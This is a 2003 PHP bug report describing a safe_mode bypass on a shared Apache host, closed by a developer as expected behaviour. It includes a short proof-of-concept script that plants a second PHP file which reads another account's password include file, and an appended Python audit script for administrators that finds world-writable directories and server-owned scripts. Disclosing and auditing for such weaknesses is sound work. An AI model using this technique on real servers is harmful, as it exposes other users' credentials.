Bug #25149 safe_mode bypass
Submitted: 2003-08-19 11:15 UTC Modified: 2003-08-19 11:18 UTC
From: marrtins at hackers dot lv Assigned:
Status: Not a bug Package: Scripting Engine problem
PHP Version: 4.3.1 OS: Linux
Private report: No CVE-ID: None

 [2003-08-19 11:15 UTC] marrtins at hackers dot lv
Description:
------------
apache_1.3.27
httpd.conf
----------
User webmaster
Group nobody

./configure --activate-module=src/modules/php4/libphp4.a --enable-module=rewrite

======================================
php-4.3.0
php.ini
---------
safe_mode               =       On

./configure \
--with-mysql=/usr/local \
--with-mcrypt=/usr/local/lib/libmcrypt \
--with-apache=../apache_1.3.27 \
--enable-track-vars \
--with-gd=/usr/local \
--with-interbase=/opt/interbase \
--enable-trans-sid \
--with-png-dir=/usr/local \
--with-jpeg-dir=/usr/local \
--with-zlib-dir=/usr/local \
--enable-sockets \
--with-gettext \
--with-xml \
--enable-ftp \
--with-imap=/root/.hore_imp/imap-2002.RC10 \
--with-iconv=/usr/local/

======================================

~/public_html> ls -al *
drwxr-xr-x    3 test     users        4096 aug 19 19:05 .
drwx--x--x    5 test     users        4096 aug 19 19:04 ..
-rw-r--r--    1 test     users         146 aug 19 18:47 hack.php
drwxrwxrwx    2 test     users        4096 aug 19 19:03 test

After accessing http://some_server/~test/hack.php, PHP makes test/stole.php

~/public_html> ls -al test
drwxrwxrwx    2 test     users        4096 aug 19 19:07 .
drwxr-xr-x    3 test     users        4096 aug 19 19:05 ..
-rw-r--r--    1 webmaste nobody         61 aug 19 19:07 stole.php

After that, http://some_server/~test/test/stole.php locally reads /www/secret/pass.inc.php, owned by webmaster

Reproduce code:
---------------
<?
  $data='<? $data = file(\'/www/secret/pass.inc.php\'); print_r($data); ?>';
  $f=fopen('/home/test/public_html/test/stole.php', 'w');
  fwrite($f, $data);
  fclose($f);
?>


 [2003-08-19 11:18 UTC] iliaa@php.net
Thank you for taking the time to write to us, but this is not
a bug. Please double-check the documentation available at
http://www.php.net/manual/ and the instructions on how to report
a bug at http://bugs.php.net/how-to-report.php

This is how safe_mode works.
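
An added example for administrators, not part of the original report or of PHP itself: safe_mode compares the owner of the running script with the owner of the file it opens, so a script created by the web server process is owned by the server account and passes that check for the account's other files. The audit below lists the two conditions visible in the listing above: world-writable directories under a web root, and PHP files owned by the web server user. The function name, the suffix list and the command-line arguments are assumptions.

```python
import os
import pwd
import stat
import sys

# Assumed list of extensions the server hands to PHP; adjust to the local config.
SCRIPT_SUFFIXES = (".php", ".php3", ".php4", ".phtml", ".inc")


def audit_web_root(root, web_uid):
    """Return (world_writable_dirs, server_owned_scripts) found under root."""
    writable_dirs, server_owned = [], []
    for dirpath, _dirnames, filenames in os.walk(root, followlinks=False):
        # A world-writable directory lets the web server account create files,
        # as with the drwxrwxrwx "test" directory in the listing.
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            writable_dirs.append(dirpath)
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, devices
            # A script owned by the server account matches the owner of every
            # other file that account owns, so the safe_mode UID check passes.
            if name.lower().endswith(SCRIPT_SUFFIXES) and st.st_uid == web_uid:
                server_owned.append(path)
    return sorted(writable_dirs), sorted(server_owned)


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: audit.py WEB_ROOT WEB_SERVER_USER")
    uid = pwd.getpwnam(sys.argv[2]).pw_uid
    dirs, scripts = audit_web_root(sys.argv[1], uid)
    for d in dirs:
        print("world-writable directory:", d)
    for s in scripts:
        print("script owned by web server user:", s)
```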
 